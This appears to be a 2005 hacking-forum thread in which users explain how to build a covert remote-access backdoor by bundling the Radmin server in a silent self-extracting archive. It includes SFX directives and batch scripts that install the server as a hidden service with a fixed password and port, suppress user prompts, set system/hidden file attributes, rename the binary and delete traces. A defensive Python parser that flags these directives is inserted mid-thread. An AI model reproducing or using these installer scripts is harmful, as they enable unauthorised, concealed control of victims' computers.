
Insanity
Simple Radmin Rootkit
Written By Insanity

Alright, this is a way of making a rootkit with the Radmin server.
There are two files in the rar: Radmin.exe and Radmin2.exe.

These programs are quite simple to make and don't take much willpower to do either.

*NOTE: with both files you need Admdll.dll and raddrv.dll because they are mandatory DLLs that you need to run the r_server service.

CODE

Radmin.exe

Okay, for radmin.exe this is what you can do: you get your files r_server, Admdll.dll, raddrv.dll and Radmin.reg

(*Note: to get radmin.reg with the settings you want, you have to install the server on your computer first and then grab the settings from the registry.)

So for the default registry in radmin.exe the tray icon is disabled and it has a default password and port.

So you make a .rar (using WinRAR), and in the comments you're going to want to put

Path=NetMeeting
SavePath
Setup=regedit.exe /s Radmin.reg
Setup=r_server.exe /pass:Insanity /port:60023 /install /silence
Setup=r_server.exe /start
Silent=1
Overwrite=2

For Path=NetMeeting, that means that it is going to install in the Program Files NetMeeting folder.

SavePath is just so everything that you execute after that is taking place there.

Setup=regedit.exe /s Radmin.exe silently adds your registry files that you got

Setup=R_server.exe /pass:Insanity /port:60023 /silence: okay, this is a big thing. If you set up your registry file with the password and port you want, then you can use that instead of this step, and that way your password and port will be encrypted and you can completely forget that step altogether.

Setup=r_server.exe /start starts up the program

Silent=1 keeps everything silent and Overwrite=2 will overwrite anything that is already in that folder.


Radmin2.exe
CODE

Radmin2.exe is basically the exact same but doesn't have a radmin.reg because it just uses the default settings and then saves the password and port via Setup=win32.exe /pass:Insanity /port:60023 /save /silence
and make sure you do
Setup=win32.exe /install /silence
(That /install is important because that installs it as a service as opposed to just running it)

This way is simpler but your password etc. are not encrypted.

R_server.exe is renamed to win32.exe and can be renamed to anything you want to make it less obvious what it is :)


There are ways to spice this up using bat files and hct and masking a service name etc. but you can figure out how to do that yourself..

good luck

Edit* Can you please move this into the right section if this isn't the right place to put it? Thank you
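
For defenders triaging a self-extracting archive, the comment script described in the post above is the artifact to inspect. The following is an added example, not part of the original post: it parses an SFX comment and flags directives that hide an installation. The function names and the flagging rules are assumptions chosen for illustration; the sample input is the script quoted in the post.

```python
import re

# The SFX comment script from the post above, reproduced as sample input.
SAMPLE = """Path=NetMeeting
SavePath
Setup=regedit.exe /s Radmin.reg
Setup=r_server.exe /pass:Insanity /port:60023 /install /silence
Setup=r_server.exe /start
Silent=1
Overwrite=2
"""

def parse_sfx_script(comment):
    """Split an SFX comment into (directive, value) pairs, lower-casing names."""
    pairs = []
    for line in comment.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):   # blank line or script comment
            continue
        key, _, value = line.partition("=")
        pairs.append((key.strip().lower(), value.strip()))
    return pairs

def triage(comment):
    """Return human-readable findings for directives that hide an install."""
    findings = []
    for key, value in parse_sfx_script(comment):
        low = value.lower()
        if key == "silent" and value in ("1", "2"):
            findings.append("installer dialogs suppressed (Silent=%s)" % value)
        if key != "setup":
            continue
        # Never echo a credential into a report or ticket.
        shown = re.sub(r"(/pass:)\S+", r"\1<redacted>", value, flags=re.I)
        if re.match(r"regedit(\.exe)?\s", low) and re.search(r"\s/s(\s|$)", low):
            findings.append("silent registry import: " + shown)
        if "/install" in low and "/silence" in low:
            findings.append("silent service install: " + shown)
        if "/pass:" in low:
            findings.append("password on command line: " + shown)
    return findings

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```
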
dissolutions
Haven't looked at the attachments but generally looks like you've got the post down pretty good,

and it is in the right forum. Will keep an eye on you and advise you if you're in the wrong section; no need to worry about it, we don't usually get nasty for misposting
Insanity
alright, well deeply appreciated for informing me of that. haha don't want anyone mad at me
sin2oo5
hey dude, i was just looking for something like that, but both executables don't seem to work for me, i just tested them in my testlab

the radmin2.exe gives an error message (admdll missing, and that's strange cuz this one is included in the rar archive right?)

the radmin.exe is just running but doesn't start the r_server.exe....
Insanity
i don't know what is wrong with radmin2.exe and for the radmin.exe try going start=radmin.bat /s

in the bat you can put
@echo off
net start r_server
net stop r_server
.
..
...
....
...
..
.
net start r_server

it should start then.. all of the dots are just cause i'm bored... if you could put like a 10 second delay time in between there (Not sure how, google it!) then it should start up the way you want... (PLUS, try making your own registry, that's the easiest way to do it)

also if you want to clean up your tracks so people don't know what service you're starting just do a
del <files you want> and they will be gone so.....
del radmin.bat
del radmin.reg
del radmin.exe (NOTE, note the R_SERVER.exe and then you will have only the necessary files you need and people won't be able to steal your stuff as easily)
cloud9ine
try this:

CODE
@echo off
regedit.exe /s Radmin.reg
remote.exe /install /silence
remote.exe /pass:infinity /port:5555 /save /silence
remote.exe /start
attrib +r +a +s AdmDll.dll
attrib +r +a +s raddrv.dll
attrib +r +a +s remote.exe
del /f Radmin.reg
echo ooooo > install.bat



Also, when creating the SFX, make sure to change the advanced options to not prompt the user, and to run install.bat after extraction


edit: I believe the reason the SFX you uploaded did not work is because it contained r_server.exe instead of remote.exe
Serhat
<removed some lines.. didn't read it properly I guess>
only thing I don't like is... well it's too easy to read the content of the SFX 'script'..

QUOTE(cloud9ine @ Jun 28 2005, 04:56 AM)
edit: I believe the reason the SFX you uploaded did not work is because it contained r_server.exe instead of remote.exe
*



That's because he uses r_server.exe in the SFX script as well.. and not remote.exe

Serhat
Insanity
lol, what's the difference between r_server and remote.exe?
if you say just the name then
QUOTE
I believe the reason the SFX you uploaded did not work is because it contained r_server.exe instead of remote.exe

is irrelevant


but yeah... i guess i could upload a couple working proggies... but i kinda like the idea of them having minor bugs because then it gives people the chance to learn from the info we have given them and to fix it themselves, that way they can make it themselves next time...

hehe but yeah mine runs with hct.exe (the undetected one) cause i like the service starting and stopping and i plan to incorporate the service daemon so it changes the service name
kuki
nice rootkit coded by You but imho you can find all these files in normal official radmin installation directory and read about "sneaky" way to execute on "help.hlp" file from da dir :x

thanks anyway <= this is *NO* thx post

BN Says: OK! <= this is *NO* warning post
Insanity
it doesn't have to be help.hlp, it can be any file and you can do that with a bunch of different ways to do that... not just with rootkits... but yeah thanks for the pointer anyways
Majika
QUOTE(Insanity @ Jun 28 2005, 12:18 AM)
also if you want to clean up your tracks so people don't know what service you're starting just do a
del <files you want> and they will be gone so.....
del radmin.bat
del radmin.reg
del radmin.exe (NOTE, note the R_SERVER.exe and then you will have only the necessary files you need and people won't be able to steal your stuff as easily)
*




That is what I have been seeing in other example kits of this kind. I have also been making these kits partly from other examples and from reading up posts like yours. I am curious about the 'del' command, what does it mean and where can I find out more about it....

I mean a proper explanation about its functions and perhaps how to implement it in a working script of my own.

Does the 'del' command work the same as the 'START' command..

other than that Insane your radmin rewtkit is a fine example

click
QUOTE(Majika @ Jul 27 2005, 05:33 PM)
I am curious about the 'del' command, what does it mean and where can I find out more about it....

I mean a proper explanation about its functions and perhaps how to implement it in a working script of my own.

Does the 'del' command work the same as the 'START' command..
*



really??? you have A LOT to learn! but, I will still try to help you out on this one...

You might want to do a ton of reading from the following sites, in the order they are listed...
h**p://83.67.55.228/page8.htm <-- overall MSDOS tutorial
h**p://www.lagmonster.org/docs/DOS7/ <-- command listing, including information on the elusive "del" command!
h**p://home7.inet.tele.dk/batfiles/ <-- information on Batch File Programming (this is what you seem to want to be able to do, but you need to read the links above first... sooo much to learn! lol)

Eventually, you will find out that Batch File Programming is EXTREMELY limited (pretty useless), but is not only a good start, but also an invaluable resource for advanced hacking (for example, with most buffer overflows). I suggest that you eventually start looking into Perl, C++, and eventually ASM. Good luck!

NOTE: just in case you are clicking on the links, and you find they don't work... just copy the link into the address box, and change h**p to http... i really hope you knew this!
tweakz20
well, I'm not sure you coded this rootkit as I have seen about 3 dozen (including one by me) of these laying around. The best way to make a rootkit out of radmin is to actually go in and hex edit the values. Overall I like the concept and it is a good first go at a rootkit.

For your next project... I would suggest trying to make a HxDef modded kit or a FU Rootkit mod

Also for further reading: www.rootkit.com <-- very good knowledge DB.

Cheers,
Insanity
lol i know all about hxdef and have rootkits made but i am trying to make it just for the purpose of introducing basic rootkits to members that don't even know that... Btw i did hex edit the values in the first one... i think, but yeah i actually coded this rootkit... but wow 3 dozen... yeah i've prob seen around 150 of those types of rootkits bouncin around and yeah it's quite interesting... i think the best way is to find kits that hackers have left and dissect them and learn that way.. that's what i tend to do for basic root kits, but as for the undetecting and what not i leave that up to c and hex edit like you said
tibbar
is this the 30 day timeout version of radmin? if not please remove the attachment since this is a commercial product.
Insanity
yes it is a 30 day trial version don't worry
Skunky88
tried to get it started with radmin2 but it starts a radmin with ntauth on my testing win2k system! someone knows what's the problem?